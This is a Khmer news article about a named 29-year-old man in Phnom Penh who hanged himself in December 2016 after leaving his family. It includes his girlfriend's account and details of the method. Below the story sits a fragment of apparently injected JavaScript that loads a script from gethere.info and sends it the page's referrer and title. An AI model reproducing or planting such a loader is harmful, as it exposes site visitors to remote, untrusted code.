Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ចុះចោលប្រពន្ធកូនទៅរស់នៅជាមួយស្រីស្នេហ៍បាន៤ខែ ចងកសម្លាប់ខ្លួន

ភ្នំពេញ៖បុរសម្នាក់បានដាច់ធ្វើអត្តឃាតដោយចងកនឹងខ្សែនីឡុងភ្ជាប់ចម្រឹងដែកបង្អួចហើយស្លាប់ដូចបំណងក្រោយ់ពីចុះចោលប្រពន្ធកូនទៅរស់នៅជាមួយស្រីស្នេហ៍បានប្រមាណជា៤ខែ ។ហេតុការណ៍នេះបង្កភ្ញាក់ផ្អើលដល់សមត្ថកិច្ចកាលពីម៉ោង១១និង៣០នាទីព្រឹកថ្ងៃទី២០ ខែធ្នូ ឆ្នាំ ២០១៦ នៅចំណុចបន្ទប់ជួលជាន់ទី ២ ផ្លូវលេខ ១៩៨០ ក្រុមទី៣ ភូមិ ទំនប់ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ ។

បុរសដែលគិតខ្លីនេះ ឈ្មោះ ហៃ រិទ្ធី អាយុ ២៩ឆ្នាំ ជាអ្នករត់ម៉ូតូឌុបនិងលក់អីវ៉ាន់តាម អនឡាយស្នាក់នៅបន្ទប់ជួល កន្លែងធ្វើអត្តឃាតខាងលើ និងមានស្រុកកំណើត ភូមិ ខ្ទរ សង្កាត់ព្រែកលៀប ខណ្ឌឫស្សីកែវ។

តាមស្រ្តីឈ្មោះគួន សុភ័ក្តថាវី អាយុ ២៣ឆ្នាំ ជាបុគ្គលិក ភោជនីយ៍ដ្ឋាន សំរិតពេជ្រ ត្រូវសង្សារ សពបានអោយដឹងថានាងមានទំនាក់ទំនងស្នេហាជាមួយ ឈ្មោះហៃ រិទ្ធី (សព) បានប្រមាណ៤ខែ ហើយបានមកស្នាក់នៅជាមួយគ្នានៅចំណុចផ្ទះជួលខាងលើ។ការរស់នៅជាមួយគ្នាមួយរយះសង្សារបស់ខ្លួនមិនមានអ្វីទេរហូតដល់ថ្ងៃទី១៥ធ្នូ២០១៦ស្រាប់តែគាត់ពោថា ពិបាកចិត្តណាស់នឹក កូនកាន់តែខ្លាំង តាំងពីឃ្លាតឆ្ងាយប្រពន្ធកូន និង គិតតែផឹក ស្រាជក់បារីនិងអង្គុយស្ងៀមស្ងាត់តែម្នាក់ឯង។

នារីជាសង្សារបានអោយដឹងទៀតថានៅល្ងាចថ្ងៃទី១៩ខែធ្នូ មុនកើតហេតុបុរសជាសង្សា បានបោះខោអាវនាងចេញក្រៅផ្ទះនិងនិយាយថាកុំនៅពិបាកជាមួយគាត់ទៀតអីពេលនោះនាងពុំព្រមទៅណា ទេក៍បានប្តូរសំលៀកបំពាក់រួចចេញទៅធ្វើការបាត់ទៅ។នៅវេលាម៉ោងប្រមាណ៣ទៀបភ្លឺចូលថ្ងៃទី២០ខែធ្នូក៍បានចេញពីធ្វើការត្រឡប់ផ្ទះវិញហៅបើកទ្វារក៍នៅមិនឆ្លើយគាត់ក៍ចូលដេកបន្ទប់ស្គាល់គ្នានៅក្បែនោះរហូតដលម៉ោងប្រមាណ៧និង៣០នាទីព្រឹកគាត់ក៍ទៅហៅទ្វាម្តងទៀតនៅតែមិនឭឆ្លើយក៍បានប្រាប់អ្នកជិតខាងនិងម្ចាស់ផ្ទះនាំគ្នាគាស់ទ្វារ ស្រាប់តែឃើញចងកសម្លាប់ខ្លួន បាត់ទៅហើយ ។

ក្នុងករណីខាងលើនេះ ភ្លាមៗម្ចាស់ផ្ទះ ពុំបានរាយការណ៍នគបាលមូលដ្ឋានឡើយរហូតដល់ម៉ោងប្រមាណ១១និង៣០នាទីទើបប្រាប់នគរបាលចុះទៅត្រួតពិនិត្យសព។តាមការបញ្ជាក់របស់សមត្ថកិច្ចជំនាញបានប្រាប់ថាបុរសខាងលើពិជាបានធ្វើអត្តឃាតដោយខ្លួនឯងពិតប្រាកដមែនហើយសពបានប្រគល់ជូនក្រុមគ្រួសារយកទៅធ្វើបុណ្យនៅវត្តចាក់អង្រែក្រោមក្នុងខណ្ឌមានជ័យ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More